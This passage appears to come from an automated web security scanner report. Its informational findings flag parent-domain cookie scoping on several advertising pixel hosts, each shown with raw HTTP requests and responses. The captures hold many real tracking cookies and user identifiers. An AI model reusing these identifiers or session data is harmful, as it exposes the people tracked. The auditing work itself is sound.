rsiPus_KoZy="MLsXrl8OZi5n4BD3cBZyjuABuWC4Csb0FwUT+Tf/ra2F23Yr8I/oeuwGctxr0i9k80z5+Ts37HpJWH5tx7ymALJCD0jt3YjxTTdM3JvgE976HlS8BET9gOVhjUYb6nxqMxO2LSljPwK3m5C91Tp/+zMbiZ3l0rXTRlqctD+i58MewI/dqdLPzRqf/27Ck4fV/tXYZjC6PsOJ0LP14q9RirhDfT4536oDEBbrBii+FPkl5ulI86i//mF/Ihwohay+AGl7Yn7K2R0FWrjhrOHtaZAMobFZE11r5ProA/7NdGfrf6pDi8cUzwkfwo+puxslrUGAu2uvT5Z0UrY8UwRkxW/vrgzFdXZqCAjwp7vzLO9CE0gZQ7wUlZGJim+VOBL1moOapTPxt4wXMk809VsgCkVFCnZ43yLvCnKFVW67eOExYmd+JNSA6VR1ad6OjY3ES0+TfN1COTV35yB2Je5lVhz8KFs9m3lE6O8klZ3o5XAqY7u1xfcrbqVVmx+aUwamFT5uGIDC3paOb5n5zA0="; 
rsi_us_1000000="pUMdIz1HMAYU1Q23kD2gQlP9hregpcCW/V5c7M/G6n4W4mvTYenih6EKWpeOr4+Ll/y5R0Unj/LO5PdEBw/eJPglYEstHCojiOu9XSRlWWR/QO1SSuxATYbIb1Lfm+FXekBMjalx+GDpg8auRaANRpH94U/E0lZJWj3fXAp3bIkV5gANlu/6hpI4w2DhRC/NVjY//S1N9dvws5Fcv0coUdJ5ovh/i6KiZ/NTh0SwAPSjFYGtC+n+BhnM7E5ccgkAVCkI932ukgJfzqwALNmXtBxTiwZIth6E1Z2Zd9anAg5EX60juVXtwhNQdqK9t3nO6LbKIyB3MtebdzKy2HVDbRuWLb2lZcUfzB20bxbKl7dD7bFNiKS6voC/k1kAfALYMhC261oMDnN7Pj+HlVnO8O+fDxcFHnLynM7rfPr1Q2PkFDRMIXaVgSfL4HzHiZbZP2AmC8AGdhZxKUfXV4Z99Rc1jtmknr7y9/O2aF45rjN4DXXTL6WcKJVbWylOgxrxUFnOR0S6er3mpddjXfX8uPcdrquy5/WNjZiFo5E9+Vv0DEnaw9phZ0cU7p8Onko84PB5HUGnzJMhBFPJkmmqNZ7LlOfsSRdjb/yPCCEot4PvJfqCpCwPYBz2l4xgSYHCoMHFh+BMm+4H7E+DhB4nCVZr8wEkzjlKDIt0O9cSthlhINJrMKroXythtqiwkeuwjz0Ygb8WpfJnrSOjIsNAt9wP196yM5K/sRFDpa9qA5Lp5nF1wHFHbYkgHAdxcjXpMaVvZ1n0GRjXJDzFqUxnp+5yWhADqUaxQOJ9LOkAGWRyqS1gIgVmxAIVc9d+FAUVCHtXs9sKQrum6vL5mvZt5HdAsvmcqsMTplSR7ALkvg8w3wrl74KIV1pxLFzZKDEAmAj9JSKDhAqlzSkpT9ifpSuGrw+BXDQyuS3hLWRbaSjb3qmhPQln3pZjJlWHUunVoJUbyEpWgRizDaTcMqabtv8+Ronk4VDjkdSas5vuJNKracRLjZa8SPtJdk1o/iLDhC1B6ittEW81WOr3Xm3hK80wa7leBcmEbUn0Hggk0E9lhdVUrOq438eNG/DhIVKO9OC5rYs2ElTc6qyDNdn9bmTUuYjb2jyTEtZAmM73J3hIqp0Nco4jeWB5mfGUj10PwA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_xaNz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP95TOFb3IQDqIu1Hhm9eJF2URyyYddaQTz7GCqw4YkAQ+qw6DMwutBdt7A14dgfNdNJ6boNHoksgj4yo4380GOe0Sly4gefJT6j60BI89IrwI3ERkQN5YzX7WgzdkBuIzeCyU5dWh0FAgZ47wCW2vuLZ+tS/27ziagTP9SATZHprMXjSYHimqnSt3PsWW1ZUw/W5zCuwAjResmzJbCl9JthdiqbMsjkghKMi7yT9T6kQyChlqMgP4aqT7tsmcOD1OLsy5KWuptM4j35YcYAFdcJp/fX5a4t0BTioh7LN+OGQishl0HmZcQTGFp7laT6B4hf5fp2UsWmuRf9bfofL7UdIrBCDeJShiozEtZ8RsSamrMQ/g22rolHVP2OA==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
Set-Cookie: NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d811&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Sun, 29-May-2011 23:34:41 GMT; Path=/
Set-Cookie: rtc_mXZ-=MLsHtaUqYR5jJ5Eert5J4zjwI0Yn0GUmvNxcOH9aUaXt40tHjX8vrSL6lIJv17IAwX/77DMkdThlYBEtanQjHiBOTu6VdD81U54WgfTp1ulWQP/xIrSVh3NFbdqPsMPlBqqoJaTKM2XOC0KXXykHjW00phpzgWrk4LpEqlq46xWLs8WebFJ9co8dW4ExdEJVKDgVM8TS3zM/XVrNVu1vqBCOR8949nZw1Rcva/IoiyX77p/ovb/wkdFouI4dNNN5sFguHBNMSNcKUIr4/Q000/FakMdPzNkviWS5wioQCKcOtbfqrbkr6GSPK1NhGk9hhZqZEnrdgIqZjIcXu3v0H9kvT36K1eYv/EG6m0azxSgssbCQgxA2vxvOG/PgijkOvxPQ14dIYkdeWaewFfby+BXqLABIuFfg/afjjo1LF7VoWe80jJbRqF4iL6UYvgrGmIXGhHvBq8JUxxzxjUC6vjlOc1jRDeUhU9/dNLgeNBoo30uJG/CIb3MMNIiruc8YYpJWUeKmABKZ7nwF2U/ROk2f7dLVpcm5nZAUNqv1wTjWzD7RzzuLow8xWnlY+oX102McprMcv1+0G5Kls8q9+a0tsc145kfssSlrOk9smBE1n2HcHmYPSuaVWFRpnWa6+VH0U8XuJBBkXxqYgupSZQxvzSHAK/8ls+qf4Pau+uAkrqyXp5REHXpZL52sZJbyyHWba7yWYJG7clfknngWYU5lXnV2Zvuh8+ww6lSRfwcQbNlnEGWf1QyfEdQGwlofRE1s102E9mXqm5DJAPuKMj8YbdK/jxyW0ToaeYF3D5g4gvzMU9i0eEeyksIWBlqKdamr7/vAqdxrH5yA2Q==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 01 May 2011 23:34:41 GMT

GIF89a.............!.......,...........D..;

16.39. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=9&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1304303011+ \"2\": 1304243633}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 512
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...

16.40. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=847987400;fpan=0;fpa=P0-1959175184-1304319359595;ns=0;url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml;ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico';ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304319368576;tzo=300;a=p-25XjRGUyZYjok HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGgAD-8kjVmtjIMAAZsBAdMGgZMAmtGCqVKLPR_BodpxqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQY5RAOiSABAshEiysQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=902031&id=1085044&id=1230047&t=2
Set-Cookie: d=ECwAD-8kjVmtjIMAAa0BAdMGgZMAmtGCqVKLPR_Bob88GbPRqWIBo0wR_hEEAcEgAAAwQBu2S7IMIDXHQxAhGxIBIgGhKLIlCWEAsS0zQjCCAwQd0cGoTRAOiSABAr4uGKGRiysQ; expires=Sun, 31-Jul-2011 01:56:08 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 02 May 2011 01:56:08 GMT
Server: QS


16.41. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=xy7kwd&next=http%3A%2F%2Fa.triggit.com%2Fpxruourcm HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:04:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C243%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Wed, 01-Jun-2011 02:04:53 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Sat, 29-Oct-2011 02:04:53 GMT; path=/; domain=.rubiconproject.com
Location: http://a.triggit.com/pxruourcm
Content-Length: 0
Content-Type: text/html; charset=UTF-8


16.42. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-I
SMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; 
rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15092%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
